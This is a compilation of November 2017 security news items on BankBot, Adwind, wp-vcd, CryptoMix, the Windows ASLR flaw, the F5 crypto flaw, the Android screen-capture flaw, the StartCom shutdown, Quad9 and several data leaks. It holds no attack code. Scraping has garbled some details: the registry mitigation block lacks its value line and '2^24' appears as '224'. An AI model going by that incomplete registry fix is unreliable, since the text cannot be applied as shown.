The security firm says Dalton and Flowsynth are based on tools that its Counter Threat Unit research team has used internally for several years. “They have been so useful that Secureworks decided to make them available to the network IDS community,” the company said.

Windows 8 and Later Fail to Properly Apply ASLR
21.11.2017 securityweek Safety
Address Space Layout Randomization (ASLR) isn’t properly applied on versions of Microsoft Windows 8 and newer, an alert from Carnegie Mellon University-run CERT Coordination Center (CERT/CC) warns.

The issue is created by the tools that enable system-wide ASLR on newer Windows systems without also setting bottom-up ASLR, a vulnerability note explains.

Starting with Windows 8, system-wide bottom-up ASLR is required for mandatory ASLR to receive entropy, but executables that do not opt in to ASLR aren’t properly randomized if the tools that enable system-wide ASLR don’t also set bottom-up ASLR.

ASLR was introduced in Windows Vista to prevent code-reuse attacks by loading executable modules at non-predictable addresses. Because of this feature, attack methods relying on code being loaded to a predictable or discoverable location, such as return-oriented programming (ROP), were mitigated.

ASLR, however, requires that the code is linked with the /DYNAMICBASE flag to opt in to ASLR, which represents an implementation weakness, the vulnerability note from DHS-sponsored CERT/CC reveals.

To protect applications that don't opt in to using ASLR (or other exploit mitigation techniques), Microsoft released the Enhanced Mitigation Experience Toolkit (EMET), which allows users to specify both system-wide and application-specific mitigations on the system.

Thus, EMET acts as a front-end GUI for system-wide exploit mitigations built in to the Windows operating system. When it comes to application-specific mitigations, the EMET library is loaded into the process space of the applications to be protected.

Starting with the Windows 10 Fall Creators update, Microsoft made EMET native to the operating system by incorporating its capabilities into the Windows Defender Exploit Guard. Both EMET and Windows Defender Exploit Guard can enable mandatory ASLR on a per-application or system-wide basis.

Starting with Windows 8, system-wide mandatory ASLR is implemented via the HKLM\System\CurrentControlSet\Control\Session Manager\Kernel\MitigationOptions binary registry value and requires system-wide bottom-up ASLR enabled to supply entropy to mandatory ASLR.

“Both EMET and Windows Defender Exploit Guard enable system-wide ASLR without also enabling system-wide bottom-up ASLR. […] This causes programs without /DYNAMICBASE to get relocated, but without any entropy. The result of this is that such programs will be relocated, but to the same address every time across reboots and even across different systems,” CERT/CC explains.

Because of this issue, non-DYNAMICBASE applications are relocated to a predictable location on Windows 8 and newer systems that have system-wide ASLR enabled via either EMET or Windows Defender Exploit Guard. This also makes exploitation of the vulnerability easier in some instances.

The CERT team notes that no practical solution to the problem is known at the moment, but that enabling system-wide bottom-up ASLR on systems that have system-wide mandatory ASLR should mitigate the issue.

Importing the following registry value enables both bottom-up ASLR and mandatory ASLR on a system-wide basis on Windows 8 or newer systems:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\kernel]


“Note that importing this registry value will overwrite any existing system-wide mitigations specified by this registry value. The bottom-up ASLR setting specifically is the second 01 in the binary string, while the mandatory ASLR setting is the first 01,” the CERT team notes.

System-wide mandatory ASLR could cause issues on systems with older AMD/ATI video card drivers in use, but the problem was addressed in the Catalyst 12.6 drivers released in June, 2012.

Microsoft was notified on the vulnerability on November 16, the vulnerability note explains.

BankBot Returns On Play Store – A Never Ending Android Malware Story
20.11.2017 thehackernews  Android

Even after so many efforts by Google for making its Play Store away from malware, shady apps somehow managed to fool its anti-malware protections and infect people with malicious software.
A team of researchers from several security firms has uncovered two new malware campaigns targeting Google Play Store users, of which one spreads a new version of BankBot, a persistent family of banking Trojan that imitates real banking applications in efforts to steal users' login details.
BankBot has been designed to display fake overlays on legitimate bank apps from major banks around the world, including Citibank, WellsFargo, Chase, and DiBa, to steal sensitive information, including logins and credit card details.
With its primary purpose of displaying fake overlays, BankBot has the ability to perform a broad range of tasks, such as sending and intercepting SMS messages, making calls, tracking infected devices, and stealing contacts.
Google removed at least four previous versions of this banking trojan from its official Android app store platform earlier this year, but BankBot apps always made their ways to Play Store, targeting victims from major banks around the world.
The second campaign spotted by researchers not only spreads the same BankBot trojan as the first campaign but also Mazar and Red Alert. This campaign has been described in detail on ESET blog.
According to an analysis performed by the mobile threat intelligence team at Avast in collaboration with ESET and SfyLabs, the latest variant of BankBot has been hiding in Android apps that pose as supposedly trustworthy, innocent-looking flashlight apps.
First spotted by the researchers on 13 October, the malicious BankBot apps uses special techniques to circumvent Google's automated detection checks, such as starting malicious activities 2 hours after the user gave device admin rights to the app and publishing the apps under different developer names.
After tricking victims into downloading them, the malicious apps check for the applications that are installed on the infected device against a hard-coded, list of 160 mobile apps.
According to the researchers, this list includes apps from Wells Fargo and Chase in the U.S., Credit Agricole in France, Santander in Spain, Commerzbank in Germany and many other financial institutions from around the world.


If it finds one or more apps on the infected smartphone, the malware downloads and installs the BankBot APK from its command-and-control server on the device, and tries to trick the victim into giving it administrator rights by pretending to be a Play Store or system update using a similar icon and package name.
Once it gets the admin privileges, the BankBot app displays overlay on the top of legitimate apps whenever victims launch one of the apps from the malware's list and steal whatever banking info the victim's types on it.
The Avast Threat Labs has also provided a video demonstration while testing this mechanism with the app of the local Czech Airbank. You can see how the app creates an overlay within milliseconds and tricks the user into giving out their bank details to criminals.
Since many banks use two-factor-authentication methods for secure transactions, BankBot includes functionality that allows it to intercept text messages, allowing criminals behind BankBot to steal mobile transaction number (mTAN) sent to the customer's phone and transfer money to their accounts.
Here's one important thing to note is that Android mechanism blocks apps installation from outside the Play Store. Even if you have already permitted installation from unknown sources, Google still requires you to press a button to continue such installations.
"Unlike this newer version of BankBot, droppers from previous campaigns were far more sophisticated," the researchers note. "They applied techniques such as performing clicks in the background via an Accessibility Service to enable the installation from unknown sources."
The latest BankBot version does not utilize this Accessibility Service feature due to Google's recent move of blocking this feature for all applications, except those designed to provide services for the blind.
Google has already removed all recently-discovered BankBot apps after being notified by the researchers.
Although it is a never-ending concern, the best way to protect yourself is always to be vigilant when downloading apps even from Google's official Play store. So, always verify app permissions and reviews before downloading an app from Google Play Store.
Even though the BankBot apps made it way into the Play Store, its payload was downloaded from an external source. So, don't allow any unknown third-party APK to be installed on your smartphone.
To do so, Go to Settings → Security and then Turn OFF "Allow installation of apps from sources other than the Play Store."
Most importantly, be careful which apps you give administrative rights to, as it is powerful and can provide a full app control of your device.

Flaw in F5 Products Allows Recovery of Encrypted Data
20.11.2017 securityweek
A crypto vulnerability affecting some F5 Networks products can be exploited by a remote attacker for recovering encrypted data and launching man-in-the-middle (MitM) attacks, the company told customers on Friday.

The impacted products are part of F5’s BIG-IP application delivery platform, including security, traffic management and performance services such as LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, and PEM. The flaw also affects the F5 WebSafe anti-fraud solution.

According to F5, the vulnerability exposes virtual servers configured with a Client SSL profile and RSA key exchange enabled to adaptive chosen-ciphertext attacks, also known as Bleichenbacher attacks. Launching an attack against a TLS session established using an RSA key exchange allows a remote hacker to recover plaintext data and launch MitM attacks, even if they don’t have access to the server’s private key.

Nick Sullivan, cryptography expert at Cloudflare, pointed out that the vulnerability is similar to the notorious DROWN bug, which allows an attacker to decrypt TLS communications when SSLv2 is used. However, he said the F5 bug is worse as the SSLv2 requirement is eliminated.

“Note that you don’t need to have the private key to decrypt non-FS [forward secrecy] TLS sessions. You only need to find a server using the key with a padding oracle,” Sullivan said. “We should all be grateful for the people in the industry who successfully pushed for forward secrecy to be the default in HTTPS.”

The vulnerability is tracked as CVE-2017-6168 and it has been assigned a CVSS score of 9.1, which puts it in the critical severity category.

F5 has released updates that patch the security hole for each of the affected products. The company has also provided advice for partial or full mitigation, and pointed out that an attack is not easy to conduct.

“Exploiting this vulnerability to perform plaintext recovery of encrypted messages will, in most practical cases, allow an attacker to read the plaintext only after the session has completed,” F5 said in its advisory.

“Exploiting this vulnerability to conduct a MiTM attack requires the attacker to complete the initial attack, which may require millions of server requests, during the handshake phase of the targeted session within the window of the configured handshake timeout,” the company added. “This attack may be conducted against any TLS session using RSA signatures, but only if cipher suites using RSA key exchange are also enabled on the virtual server. The limited window of opportunity, limitations in bandwidth, and latency make this attack significantly more difficult to execute.”

The vendor said the highest risk is to virtual servers where the Generic Alert option, which is enabled by default, has been disabled. This is due to the fact that these systems report the specific handshake failure, which can be useful to the attacker, instead of a generic message.

The security hole was reported to the vendor by Tripwire’s Craig Young, researcher Hanno Böck, and Juraj Somorovsky of Ruhr-Universität Bochum. It’s worth noting that Somorovsky was part of the team that first described the DROWN attack. Details of the vulnerability will be published at a later date.

Screen/Audio Capture Vulnerability Impacts Lion's Share of Android Devices
20.11.2017 securityweek Android
A vulnerability that allows malicious applications to capture screen contents and record audio without a user’s knowledge impacts over 78% of Android devices, researchers claim.

The issue is caused by the MediaProjection service introduced by Google in the Android Framework on Android 5.0. This service allows applications to capture the screen or record audio without special permissions, by simply requesting access via an Intent.

Prior to Android 5.0, an application would either have to run with root privileges or be signed with the device’s release keys to use system protected permissions to capture screen contents, MWR Labs security researchers explain. With the introduction of MediaProjection, no permissions are required in the AndroidManifest.xml to use the service.

When an application requires access to this system Service, a SystemUI pop-up is displayed to warn the user that the program wants to capture the screen. According to MWR, however, an attacker could overlay the SystemUI pop-up with an arbitrary message meant to trick the user into granting the malicious app the ability to capture the screen.

“This vulnerability would allow an attacker to capture the user’s screen should the user tap of the SystemUI pop-up that has been overlayed by the attacker with an arbitrary message,” the security researchers explain in a security advisory (PDF).

MWR also explains that it is difficult to determine which applications use the MediaProjection service, given that there are no permission requirements. Furthermore, the researchers claim that the vulnerability is severe because the SystemUI pop-up is launched within the context of the attacker’s application, meaning that the app can detect it and draw the overlay without the user noticing.

“The primary cause of this vulnerability is due to the fact that affected Android versions are unable to detect partially obscured SystemUI pop-ups. This allows an attacker to craft an application to draw an overlay over the SystemUI pop-up which would lead to the elevation of the application’s privileges,” the researchers argue.

Because the SystemUI pop-up is the only access control mechanism meant to prevent malicious applications from abusing the MediaProjection service, an attacker could also bypass the mechanism by tapjacking the pop-up using publicly available methods.

The vulnerability has been addressed in Android 8.0, but version fragmentation within the Android ecosystem means that there are a great deal of devices that will never receive a patch, thus remaining vulnerable. It’s unclear whether patches will be released for older Android iterations as well, MWR says.

As of November 9, 2017, vulnerable platform releases (Android 5.0 to Android 7.1) are running on 78.7% of Android devices out there.

The good news is that the attack is not entirely undetectable: “when an application gains access to the MediaProjection service, it generates a Virtual Display which activates the screencast icon in the notification bar,” the researchers explain.

Application developers can defend against this attack by enabling the FLAG_SECURE layout parameter via the application's WindowManager. Thus, the contents of applications are treated as secure and won’t appear in screenshots.

MWR reported the issue to Google in January this year. The Internet giant assessed the vulnerability as High risk and released Android 8.0 with a patch for it, but hasn’t provided information on patches for Android 7.1.2 to 5.0 as of now, the researchers reveal.

Ongoing Adwind Phishing Campaign Discovered
20.11.2017 securityweek
A new phishing campaign delivering the Jsocket variant of Adwind (also known as AlienSpy) was detected in October, and is ongoing. Adwind and its variants have been around since at least 2012. It is a cross-platform backdoor able to install additional malware, steal information, log keystrokes, capture screenshots, take video and audio recordings, and update its own configuration.

According to Kaspersky Lab's virus definition, "it is distributed openly in the form of a paid service, where the "customer" pays a fee in return for use of the malicious program. There were around 1,800 users of the system by the end of 2015. This makes it one of the biggest malware platforms in existence today."

The current campaign was detected by KnowBe4, a security awareness firm, and reported in a blog by CEO Stu Sjowerman posted today. KnowBe4 provides users with a phish alert button that notifies both the company's security team and KnowBe4 when a suspicious email is received.

"In early October we noticed an uptick in the number of phishing emails reported by customers that were sporting .JAR (Java) attachments -- a hallmark of Adwind," writes Sjowerman. There is no indication of the size of this new campaign, which is unsurprising since KnowBe4's awareness comes primarily from those of its own customers that have installed its phish alert button.

However, since Adwind is sold as a service, it can at any time be delivered as a new bulk campaign or even by multiple cybercriminals using different customizations with different functionalities. In February 2016, Kaspersky Lab estimated that approximately 443,000 targets had been hit with Adwind by the end of 2015.

In July 2017, Trend Micro noted an Adwind campaign that started with 5,286 detections in January and grew to 117,649 detections in June -- with a 107% growth between May and June. If this pattern repeats, what is currently noted by KnowBe4 as "an uptick in the number of phishing emails reported by customers," could be the beginning of a major new Adwind campaign.

"All the Adwind phishes in this upsurge," comments Sjowerman, "used Subject: lines and social engineering schemes centered on everyday business documents and related forms: invoices, purchase orders, payment instructions, contracts, and RFQs (requests for quotations)." The campaign is apparently targeting businesses rather than consumers. This is very similar to an Adwind alert issued by McAfee in December 2015, which included Subject lines such as "credit note for outstanding payment of Invoice", "PO#939423" and "Re: Payment/TR COPY-Urgent".

KnowBe4 provides two sample phishing emails. One includes the payload in a .JAR file. In this instance, Outlook blocks access to the attachment as being 'potentially unsafe'. In the second example, the payload is contained in a zip file, and is not blocked by Outlook. KnowBe4 doesn't comment on whether this difference, together with stylistic differences between the two email bodies, indicates that multiple groups are sending out Adwind phishes.

Sjowerman is particularly concerned about the ability of anti-virus defenses to recognize and block Adwind. "Although we can say that anti-virus engine detections appear to have improved with time, they are still not at a level that would inspire confidence, with the samples we submitted [to VirusTotal] being picked up by only 16-24 engines (out of 60 total) -- roughly 26%-40% of tested engines -- even weeks after their original appearance in the wild."

He accepts that VirusTotal does not accurately reflect the true performance of an AV product. "It is worth noting," he adds, "that most endpoint anti-virus products now incorporate heuristics-driven behavioral detection capabilities that allow them to provide protection beyond their more traditional, file-focused core engines."

His concern, however, is over the extent of anti-detection capabilities built into Adwind. These include sandbox detection; detection, disabling and killing of various antivirus and security tools; TLS-protected command-and-control; and anti-reverse engineering/debugging protection.

"Many of these [antivirus] behavioral protection schemes intervene only after malicious files land on the file system and execute... And given that Adwind itself sports extremely aggressive tools to detect, thwart, and kill all manner of security tools, the best approach to handling an advanced threat like Adwind is to prevent it from being downloaded and executed in the first place."

In short, the best prevention for Adwind is the human firewall of user awareness.

KnowBe4 raised $30 million in Series B financing led by Goldman Sachs Growth Equity in October 2017.

Microsoft Manually Patched Office Component: Researchers
20.11.2017 securityweek
Microsoft engineers appear to have manually patched a 17 year-old vulnerability in Office, instead of altering the source code of the vulnerable component, ACROS Security researchers say.

Tracked as CVE-2017-11882, the vulnerability was addressed with a fixed release on November 14 as part of Microsoft’s Patch Tuesday security updates. The issue was discovered by Embedi security researchers in the Microsoft Equation Editor (EQNEDT32.EXE), a tool that remained unchanged in the Office suite since November 9, 2000.

While analyzing the patched version of the file, the researchers from ACROS Security’s 0patch Team discovered that it was nearly identical with the original file, although the new compilation date is 2017.8.14.0.

This would not be possible if Microsoft made the necessary corrections to the source code and then re-built the binary. However, manually patching the binary executable makes this possible, and this is what the researchers believe happened with the Equation Editor.

“Really, quite literally, some pretty skilled Microsoft employee or contractor reverse engineered our friend EQNEDT32.EXE, located the flawed code, and corrected it by manually overwriting existing instructions with better ones (making sure to only use the space previously occupied by original instructions),” Mitja Kolsek from the 0patch Team explains.

Proof of that can be easily found when comparing the original and the patched file versions. No C/C++ compiler “would put all functions in a 500+ KB executable on exactly the same address in the module after rebuilding a modified source code,” the researcher notes.

BinDiff results between the two files show that all EA primary values are identical to EA secondary values of matched functions and that even the patched functions have the same address in both EQNEDT32.EXE versions.

The vulnerability discovered by Embedi consisted of the Equation Editor not checking whether the destination buffer was large enough for the user-supplied string. Thus, if the font name provided through the Equation object has a name long enough, it could cause a buffer overflow.

An additional parameter added to this function now specifies the destination buffer length, which the original logic of the character-copying loop now ends when the destination buffer length is reached as well, to prevent buffer overflow.

“In addition, the copied string in the destination buffer is zero-terminated after copying, in case the destination buffer length was reached (which would leave the string unterminated),” Kolsek notes.

According to the researcher, in addition to adding said check for buffer length, the engineers who patched the function also managed to make it 14 bytes shorter. On top of that, it appears that the engineers patched other functions in the component as well, most probably because they discovered additional vulnerabilities and decided to resolve them too.

Two functions in the patched version now have boundary checks injected right before inlined memcpy operations. According to Kolsek, the engineers who patched the Equation Editor used only a single instruction (instead of two) for implementing the checks, thus leaving the code logically identical, but also freeing up space for injecting the check and for zero-terminating the copied string.

“There are six such length checks in two modified functions, and since they don't seem to be related to fixing CVE-2017-11882, we believe that Microsoft noticed some additional attack vectors that could also cause a buffer overflow and decided to proactively patch them,” the researcher points out.

Kolsek also notes that patching a software product in its binary form instead of rebuilding it from modified source code is very difficult, but that Microsoft’s engineers did a stellar job when fixing the Equation Editor. The component might be old, but it’s still required to ensure compatibility with documents that contain equations in the old format.

The only question that remains unanswered is why Microsoft chose to maintain the component in its binary form instead of altering the source code and recompiling it instead. Some suggest that the company might have lost the component’s source code.

We contacted Microsoft for a comment on this and will update the article as soon as we hear back.

StartCom CA to Shut Down After Ban by Browser Vendors
20.11.2017 securityweek Security
The board of directors of China-based certificate authority StartCom announced on Friday that it has decided to shut down the company following the decision of major browser vendors to ban its certificates.

StartCom is a subsidiary of WoSign, a certificate authority (CA) owned by Chinese cybersecurity firm Qihoo 360. In September 2016, Mozilla informed the community of more than a dozen incidents involving WoSign and StartCom, including misissuance of certificates and attempting to hide the fact that WoSign had acquired StartCom in November 2015.

Shortly after, WoSign started making changes to leadership, operational processes and technology. However, all the major browser vendors – Apple, Microsoft, Google and Mozilla – announced in the following months their decision to ban WoSign and StartCom certificates.

StartCom has been having problems with getting reincluded in certificate trust stores, which is why its board decided to shut down the company. StartCom will stop selling certificates in January 1, 2018, and it will continue to maintain its Online Certificate Status Protocol (OCSP) and Certificate Revocation List (CRL) services for another two years. In 2020, the company will eliminate its three root pairs.

“Yes, of course we will still contribute to Community and focus on security research,” said Xiaosheng Tan, chairman of StartCom’s board and CSO of Qihoo 360. “During the last ten years, the 360 security research teams have discovered hundreds of vulnerabilities in the major software companies and earned many acknowledgments in the world. Qihoo 360 and the PKI community share the same goal, which is making the internet a better place.”

As for WoSign, the company is working on getting re-included into trust stores. Earlier this year, its source code and infrastructure were analyzed by Germany-based Cure53 over a period of 40 days. The audit led to the discovery of 22 issues, but a majority of them were not actual vulnerabilities and Cure53 concluded that WoSign had made security a priority.

Mozilla will completely ban WoSign and StartCom certificates starting with Firefox 58, scheduled for release in January next year. Google did so in September with the release of Chrome 61. Microsoft also stopped trusting certificates issued by the companies after September 2017.

Experts observed a new wave of wp-vcd malware attacks targeting WordPress sites
20.11.2017 securityaffairs

Experts from the firm Sucuri observed a new wave of wp-vcd malware attacks that is targeting WordPress sites leveraging flaws in outdated plugins and themes
A new malware campaign is threatening WordPress installs, the malicious code tracked as wp-vcd hides in legitimate WordPress files and is used by attackers to add a secret admin user and gain full control over infected websites.

The malware was first spotted in July by the Italian security expert Manuel D’Orso who noticed that the malicious code was loaded via an include call for the wp-vcd.php file and injected malicious code into WordPress core files such as functions.php and class.wp.php.

The wp-vcd malware attacks continued, evolving across the months. Recently researchers from Sucuri firm discovered a new strain of this malware that injected malicious code in the legitimate files of the two the default themes “twentyfifteen” and “twentysixteen”included in the WordPress CMS in 2015 and 2016.

This is an old tactics that leverage themes files (active or not) files to hide malicious code, in the specific case the malware creates a new “100010010” admin user with the intent to establish a backdoor into the target installation.

Hackers triggered vulnerabilities in outdated plugins and themes to upload the wp-cvd malware.

“The injection, on most of the cases we found, was related to outdated software (plugins or themes). Which a simple update or using a WAF would prevent.” reads the blog post published by Sucuri.

“Code is pretty straightforward and doesn’t hide its malicious intentions by encoding or obfuscation of functions…”

Outdated and vulnerable plugins represents a privileged entry point for hackers, last week the researcher Jouko Pynnönen from Finland-based company Klikki Oy discovered several vulnerabilities in the Formidable Forms plugin the exposes websites to attacks.

The Formidable Forms plugin allows users to easily create contact pages, polls and surveys, and many other kinds of forms, it has more than 200,000 active installs.

Pynnönen discovered that the dangerous flaws affect both the free and as a paid version.

The most severe issue discovered by the expert is a blind SQL injection that can be exploited by attackers to enumerate a website’s databases and access their content, including user credentials and data submitted to a website via Formidable forms.

Global Cyber Alliance launched the Quad9 DNS service to secure your online experience
20.11.2017 securityaffairs Safety

Global Cyber Alliance launched the Quad9 DNS service, the free DNS service to secure your online experience and protect your privacy.
The Global Cyber Alliance (GCA) has launched the Quad9 DNS service (, a new free Domain Name Service resolver that will check user’s requests against the IBM X-Force’s threat intelligence database.

The Quad9 DNS service non only offer common resolution services implemented by DNSs but it will also add the security checks to avoid you will visit one of the the 40 billion malicious websites and images X-Force marked as dangerous.

The Global Cyber Alliance (GCA) was co-founded by a partnership of law enforcement and research organizations (City of London Police, the District Attorney of New York County and the Center for Internet Security) focused on combating systemic cyber risk in real, measurable ways.

GCA also coordinated the threat intelligence community to incorporate feeds from 18 other partners, “including Abuse.ch, the Anti-Phishing Working Group, Bambenek Consulting, F-Secure, mnemonic, 360Netlab, Hybrid Analysis GmbH, Proofpoint, RiskIQ, and ThreatSTOP.”

Back in 1988 some large /8 blocks of IPv4 addresses were assigned in whole to single organizations or related groups of organizations, either by the Internet Corporation for Assigned Names and Numbers (ICANN), through the Internet Assigned Numbers Authority (IANA), or a regional Internet registry.

Each /8 block contains 224 = 16,777,216 addresses, and IBM secured the block which let the company dedicate to the project.

“IBM Security, Packet Clearing House (PCH) and The Global Cyber Alliance (GCA) today launched a free service that gives consumers and businesses added privacy and security as they access the internet. The new Quad9 Domain Name System (DNS) service protects users from accessing millions of malicious internet sites known to steal personal information, infect users with ransomware and malware, or conduct fraudulent activity.” reads the announcement published by the GCA.

According to the GCA, Quad9 has no impact on the speed of the connections, it is leveraging the Packet Clearing House global assets around the world with 70 points of presence in 40 countries.

The alliance believes that Quad9 points of presence will double over the next 18 months, further improving the speed, performance, privacy and security for users globally.

Quad9 DNS service

The organization is specifically committed to protect the users’ privacy, Quad9 service doesn’t retain request data.

“Information about the websites consumers visit, where they live and what device they use are often captured by some DNS services and used for marketing or other purposes”, it said.

The Quad9 service aims to cover not only traditional PCs and laptops, but can also Internet of Things (IoT) devices such as smart thermostats and connected home appliances. These devices often do not receive important security updates and are also difficult to secure with traditional anti-virus tools, yet remain connected to the internet leaving them vulnerable to hackers.

Full instructions on what a DNS service does and how to switch to Quad9 can be found here.

Unprotected Pentagon Database Stored 1.8 Billion Internet Posts
20.11.2017 securityweek BigBrothers
Researchers have found an unprotected database storing 1.8 billion posts collected from social media services, news websites and forums by a contractor for the U.S. Department of Defense.

The data was discovered on September 6 by Chris Vickery, director of risk research at cyber resilience firm UpGuard, inside an AWS S3 storage bucket that was accessible to any user with an AWS account.

Based on the names of the subdomains storing it, the information appears to have been collected for the U.S. Central Command (CENTCOM) and the U.S. Pacific Command (PACOM), unified combatant commands of the Department of Defense.

The exposed records represent comments posted on news websites, forum messages, and posts from social media services such as Facebook, and they cover a wide range of topics, including sports, video games, celebrities and politics. The data had been collected between 2009 and present day.

While some of the posts appear to be written by American citizens, many of them are in Arabic, Farsi and various dialects spoken in Pakistan and Afghanistan.

“Arabic posts criticizing or mocking ISIS, posted to Facebook pages for Iraqi anti-jihadi groups, or Pashto language comments made on the official Facebook page of Pakistani politician Imran Khan, who has drawn scrutiny from both the Taliban and the US government, give some indication of content that might be of interest to CENTCOM in its prosecution of regional wars and against Islamic extremists,” UpGuard said in a blog post.

The vast amount of information has been set up for searches via Apache Lucene, a high-performance, full-featured text search engine library.

An analysis of the data showed that it was likely collected for the Pentagon by VendorX, a now-defunct private sector contractor. While it had been in operation, the company claimed it was working on Outpost, a “multi-lingual platform designed to positively influence change in high-risk youth in unstable regions of the world.” The project was exclusively run for CENTCOM.

While the exposed data has been collected from public sources, UpGuard believes the incident raises some questions about the privacy and civil liberties impact of the U.S. government’s intelligence operations. The leak also once again highlights the risks associated with third-party vendors.

The Department of Defense has secured the leaky database. The organization told CNN that the information is not collected or processed for any intelligence purposes. A representative of CENTCOM said the data is “used for measurement and engagement activities of our online programs on public sites,” but declined to elaborate.

This is not the first time UpGuard has found an unprotected AWS S3 bucket storing data belonging to a high profile organization. In the past months, the company discovered similar leaks tied to Accenture, the U.S. Republican Party, TigerSwan, Verizon, and the U.S. military.

A bug in the Android MediaProjection service lets hackers to record audio and screen activity on 77% of all devices
20.11.2017 securityaffairs Android

A flaw in the Android MediaProjection service could be exploited by an attacker to record audio and screen activity on around 77.5% of all Android devices.
A vulnerability affecting Android smartphones running Lolipop, Marshmallow, and Nougat (Around 77.5% of all Android devices) could be exploited by an attacker to record audio and screen activity.

The vulnerability resides in the Android MediaProjection service that has the access to both screen contents and record system audio.

Starting with the release of Android Lolipop (5.0), the MediaProjection service is not restricted to users with root access.

“To use the MediaProjection service, an application would simply have to request access to this system Service via an Intent. Access to this system Service is granted by displaying a SystemUI pop-up that warns the user that the requesting application would like to capture the user’s screen.” the MWR team wrote in a report.

The researchers explained that an attacker could overlay this SystemUI pop-up which warns the user that the contents of the screen and system audio would be captured, with an arbitrary message to trick the user into granting a malicious application the ability to capture the user’s screen.

The lack of specific android permissions to use this API makes it difficult check if an application uses the MediaProjection service to record video and audio. The unique access control mechanism available to prevent the abuse of the MediaProjection service s the SystemUI pop-up that could be easily bypassed.

The root cause of this vulnerability is due to the fact that vulnerable Android versions don’t implement mechanisms to detect partially obscured SystemUI pop-ups.

An attacker can craft an application to draw an overlay over the SystemUI pop-up which would lead to the elevation of the application’s privileges.

“Furthermore, the SystemUI pop-up is the only access control mechanism available that prevents the abuse of the MediaProjection service. An attacker could trivially bypass this mechanism by tap-jacking this pop-up using publicly known methods to grant their applications the ability to capture the user’s screen.” added MWR.

“This vulnerability would allow an attacker to capture the user’s screen should the user tap of the SystemUI popup that has been overlayed by the attacker with an arbitrary message.”

Google patched the vulnerability only in Android Oreo Android Oreo (8.0), older versions are still affected by the bug.

Researchers highlighted that the attack exploiting this flaw is not entirely undetectable. When an application gains access to the MediaProjection Service, it generates a Virtual Display which activates the screencast icon in the notification bar as the following image shows:

Android MediaProjection service -screencast-icon

It is unclear if Google plans to fix the vulnerability also for older affected versions of Android, for this reason users should update their devices.

MWR also provided a workaround to Android application developers that can address the issue by enabling the FLAG_SECURE layout parameter via the application’s WindowManager. This would ensure that the content of the applications windows is treated as secure, preventing it from appearing in screenshots or from being viewed on non-secure displays.

The controversial certificate authority StartCom will go out of business on January 1, 2018
20.11.2017 securityaffairs Security

The Startcom CA board chairman Xiaosheng Tan, announced that the controversial certificate authority will end its activity on January 1, 2018.
The controversial certificate authority StartCom is going to close, according to board chairman Xiaosheng Tan, the business will end its activity on January 1, 2018.

Starting from January 1, 2018, StartCom will no longer issue new digital certificates, but CRL and OCSP service will continue for two years, until the expiration of the StartCom’s three key root pairs.

🌽🌽🌽🌽 CORN FACTS 🌽🌽🌽🌽 @SwiftOnSecurity
First reply to StartCom announcing the end of its certification business is a founding engineer glad it's dead 😳https://groups.google.com/d/msg/mozilla.dev.security.policy/LM1SpKHJ-oc/ReT-B5lgAQAJ …

9:44 PM - Nov 17, 2017

Re: Termination of the certificates business of Startcom
Posted by joachim.ba...@gmail.com, Nov 17, 2017 9:32 AM

3 3 Replies 24 24 Retweets 56 56 likes
Twitter Ads info and privacy
In July, Google warned website owners that it will completely ban digital certificates issued by the Chinese certificate authority WoSign and its subsidiary StartCom. The Tech giant announced it will no longer trust the WoSign certificates starting with Chrome 61.
Startcom and Wosign certificates have been put on untrusted lists by almost any major browser firms, including Mozilla, Apple, Google and Microsoft.
For this reason, according to Tan the shut down of the CA “would not have a major impact.”

According to w3techs.com, about 0.1 per cent of websites worldwide still use StartCom as an SSL certificate authority.

The following diagram shows the historical trend in the percentage of websites using StartCom.
StartCom CA

According to UIDAI, more than 200 government websites made Aadhaar users’ details public
20.11.2017 securityaffairs BigBrothers

According to the Unique Identification Authority of India (UIDAI), Aadhaar details were displayed on 210 government websites.
The state government websites publicly displayed personal details such as names and addresses of Aadhaar users.

The Aadhaar is the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017.

The role of the system is crucial for both authenticating and authorizing transactions and is a pillar of the Indian UID (unique identification database).

The Aadhaar issuing body confirmed that the data was removed from the websites just after the data breach was noticed, but it did provide further details on the alleged hack.

Even if the UIDAI never publicly disclosed Aadhaar details public, more than 200 websites of central government and state government departments, were displaying the list of beneficiaries along with their name, address, other details and Aadhaar numbers.

“Though the UIDAI never made Aadhaar details public, 210 websites of central government and state government departments including educational institutes were displaying the list of beneficiaries along with their name, address, other details and Aadhaar numbers of general public.” reported the IndiaToday website.

Aadhaar system
The Aadhaar architecture has been designed to ensure the data security and privacy.

“Various policies and procedures have been defined, these are reviewed and updated continually thereby appropriately controlling and monitoring any movement of people, material and data in and out of UIDAI premises, particularly the data centres,” the UIDAI said.

The UIDAI confirmed that the security audits are conducted on a regular basis to improve the security and privacy of data, it confirmed the efforts to make the data safer and protected.

Cash Converters suffered a data breach, users of the old webshop are at risk
19.11.2017 securityaffairs  Crime

Cash Converters suffered a data breach, its old webshop that was withdrawn on 22 September was hacked and attackers gained unauthorised access to customer data
The High street pawnbroker Cash Converters, which sells small loans and second-hand jewellery, has announced it’s suffered a data breach that could put at risk some of its customers are.

Customers were notified of the data breach this week, on Thursday the firm sent them an email to explain what has happened.

“Along with the relevant authorities we are investigating this as a matter of urgency.” reads a statement from Cash Converters.

“We are also actively implementing measures to ensure that this cannot happen again.”

According to the company, its old online website that was withdrawn on 22 September was hacked and attackers gained unauthorised access to customer data from its UK e-commerce. The current version of the e-commerce platform used by the firm is not affected.

Even if the website was not storing financial data, attackers may have accessed user records, including personal details, passwords, and purchase history from a website that was run by a third party. Cash Converters closed the contract with this third party in September.

cash converters

If you have had a Cash Converters account online change your password, including on websites and log-ins where the same credentials have been used.

The company has reported the data breach to authorities in the UK and Australia, it is still investigating the incident.

A spokesman for the ICO confirmed it was looking into the reported breach.

“We’re aware of an incident at Cash Converters UK and will be making enquiries,” he said.

Users that receive anything suspicious can report it through Cash Converters or Action Fraud

A second variant of the new Cryptomix Ransomware released in a few days
19.11.2017 securityaffairs 

Malware researchers at MalwareHunterTeam discovered a new variant of the CryptoMix ransomware, the second one in just a few days.
A new variant of the CryptoMix ransomware was recently discovered by the experts at the MalwareHunterTeam, it is the second release of new variants this week.

The latest variant appends the. 0000 extension to encrypted files and uses new contact emails, for example, a test file encrypted by this variant has an encrypted file name of 0D0A516824060636C21EC8BC280FEA12.0000.

